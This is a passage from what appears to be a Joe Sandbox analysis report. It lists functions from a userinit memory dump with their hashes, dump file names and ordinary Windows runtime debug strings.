                                                                • Opcode Fuzzy Hash: 167d9e7c3f38d97127b193723786296a747cce69fb3f86faa9774502b2717fad
                                                                • Instruction Fuzzy Hash: D421887AE00219ABDB10EF79CC44AFEBBFDEF58644F180516E915E7201E730DA059BA1
                                                                Function 0375F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 037A02BD
                                                                • RTL: Re-Waiting, xrefs: 037A031E
                                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 037A02E7
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3906544374.0000000003700000.00000040.00001000.00020000.00000000.sdmp, Offset: 03700000, based on PE: true
                                                                • Associated: 00000009.00000002.3906544374.0000000003829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.3906544374.000000000382D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.3906544374.000000000389E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3700000_userinit.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                • API String ID: 0-2474120054
                                                                • Opcode ID: 01f9a5e3977f077ae3bd2437559838a7ccb6571cd041bb0709c90306c059b119
                                                                • Instruction ID: effc0d931d40255c600544964e6df82c70d3641d95977dcc4afaa1d607c37220
                                                                • Opcode Fuzzy Hash: 01f9a5e3977f077ae3bd2437559838a7ccb6571cd041bb0709c90306c059b119
                                                                • Instruction Fuzzy Hash: ADE1AD30604B41DFD728CF28C884B6AB7E4FB88714F184A6DF9A58B2D1D7B5E945CB42
                                                                Function 0376BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • RTL: Re-Waiting, xrefs: 037A7BAC
                                                                • RTL: Resource at %p, xrefs: 037A7B8E
                                                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 037A7B7F
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3906544374.0000000003700000.00000040.00001000.00020000.00000000.sdmp, Offset: 03700000, based on PE: true
                                                                • Associated: 00000009.00000002.3906544374.0000000003829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.3906544374.000000000382D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.3906544374.000000000389E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3700000_userinit.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                • API String ID: 0-871070163
                                                                • Opcode ID: 7c3439e3126c6349ba12c672120713892f8298ae1bf3f75c0509ca4952915f2a
                                                                • Instruction ID: de8f3737adf42eb766debcd919cd274b17b85a680cd0e3bb3adc87b11dce2edd
                                                                • Opcode Fuzzy Hash: 7c3439e3126c6349ba12c672120713892f8298ae1bf3f75c0509ca4952915f2a
                                                                • Instruction Fuzzy Hash: CB41E3753007429FC724DE6ACC50BAAB7E9EF89710F140A2DE956DB690DB30E8058B91
                                                                Function 0376B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 037A728C
                                                                Strings
                                                                • RTL: Re-Waiting, xrefs: 037A72C1
                                                                • RTL: Resource at %p, xrefs: 037A72A3
                                                                • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 037A7294
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3906544374.0000000003700000.00000040.00001000.00020000.00000000.sdmp, Offset: 03700000, based on PE: true
                                                                • Associated: 00000009.00000002.3906544374.0000000003829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.3906544374.000000000382D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.3906544374.000000000389E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3700000_userinit.jbxd
                                                                Similarity
                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                • API String ID: 885266447-605551621
                                                                • Opcode ID: 1aa5ed8deafa9036520635acc1ea408ac7cb091e8829f7816e333e40be69c978
                                                                • Instruction ID: a8afe796358e907fb7d839409fbb5d6e156cccbed6ceee4f85636fc0b8849eba
                                                                • Opcode Fuzzy Hash: 1aa5ed8deafa9036520635acc1ea408ac7cb091e8829f7816e333e40be69c978
                                                                • Instruction Fuzzy Hash: 5B41F036700646ABC724DE69CC41BAABBB5FF85710F140629FD55EB280DB20F852D7D1
                                                                Function 037E2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3906544374.0000000003700000.00000040.00001000.00020000.00000000.sdmp, Offset: 03700000, based on PE: true
                                                                • Associated: 00000009.00000002.3906544374.0000000003829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.3906544374.000000000382D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.3906544374.000000000389E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3700000_userinit.jbxd
                                                                Similarity
                                                                • API ID: ___swprintf_l
                                                                • String ID: %%%u$]:%u
                                                                • API String ID: 48624451-3050659472
                                                                • Opcode ID: 9ff631be399c5ad3980db6c7a92d40aa919dc773724325447bcfc7543c249358
                                                                • Instruction ID: 31998f9669428fac11c2903361fdb067a68e3276784359392cfeb0ff19006303
                                                                • Opcode Fuzzy Hash: 9ff631be399c5ad3980db6c7a92d40aa919dc773724325447bcfc7543c249358
                                                                • Instruction Fuzzy Hash: 3B317876A00219AFDB20EF29CC44BEEB7FCEF48610F544556E849E7241EB30DA449FA0
                                                                Function 03777D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3906544374.0000000003700000.00000040.00001000.00020000.00000000.sdmp, Offset: 03700000, based on PE: true
                                                                • Associated: 00000009.00000002.3906544374.0000000003829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.3906544374.000000000382D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.3906544374.000000000389E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3700000_userinit.jbxd
                                                                Similarity
                                                                • API ID: __aulldvrm
                                                                • String ID: +$-
                                                                • API String ID: 1302938615-2137968064
                                                                • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                • Instruction ID: d432417ef1984ae5161a4b65128e78b3707c7447f4472256fa85b49b8a2de24f
                                                                • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                • Instruction Fuzzy Hash: E191C670E0029AEBDF28DF69C985ABEB7B5FF44320F58451AE865EB2C0D7708942C751
                                                                Function 03739126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3906544374.0000000003700000.00000040.00001000.00020000.00000000.sdmp, Offset: 03700000, based on PE: true
                                                                • Associated: 00000009.00000002.3906544374.0000000003829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.3906544374.000000000382D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.3906544374.000000000389E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3700000_userinit.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $$@
                                                                • API String ID: 0-1194432280
                                                                • Opcode ID: 00d750ed9975d4c9784849a775cdf9f16811852fa27402cf1930b3d5d4f0c84f
                                                                • Instruction ID: f3762cf06c55398297386bf0cb38debe67d2c673b851f1e82de8988030a4c907
                                                                • Opcode Fuzzy Hash: 00d750ed9975d4c9784849a775cdf9f16811852fa27402cf1930b3d5d4f0c84f
                                                                • Instruction Fuzzy Hash: 71813B76D002699BDB31DF54CC44BEEB7B8AB49710F0445DAEA09B7681E7709E80CFA0
                                                                Function 037BCEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • @_EH4_CallFilterFunc@8.LIBCMT ref: 037BCFBD
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3906544374.0000000003700000.00000040.00001000.00020000.00000000.sdmp, Offset: 03700000, based on PE: true
                                                                • Associated: 00000009.00000002.3906544374.0000000003829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.3906544374.000000000382D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.3906544374.000000000389E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3700000_userinit.jbxd
                                                                Similarity
                                                                • API ID: CallFilterFunc@8
                                                                • String ID: @$@4Qw@4Qw
                                                                • API String ID: 4062629308-2383119779
                                                                • Opcode ID: 4330369866dcc672b0345ab1c06c494f8f11b81c501f7788f057748262b31055
                                                                • Instruction ID: 9b94882ec219b724689109dfd6b1ddefb6dc090bb145f88f380fafdfeecf7bfe
                                                                • Opcode Fuzzy Hash: 4330369866dcc672b0345ab1c06c494f8f11b81c501f7788f057748262b31055
                                                                • Instruction Fuzzy Hash: D741D079A00228DFCB21DFA8C844BADBBB8EF55704F0484AAE914DF254D774D941CB60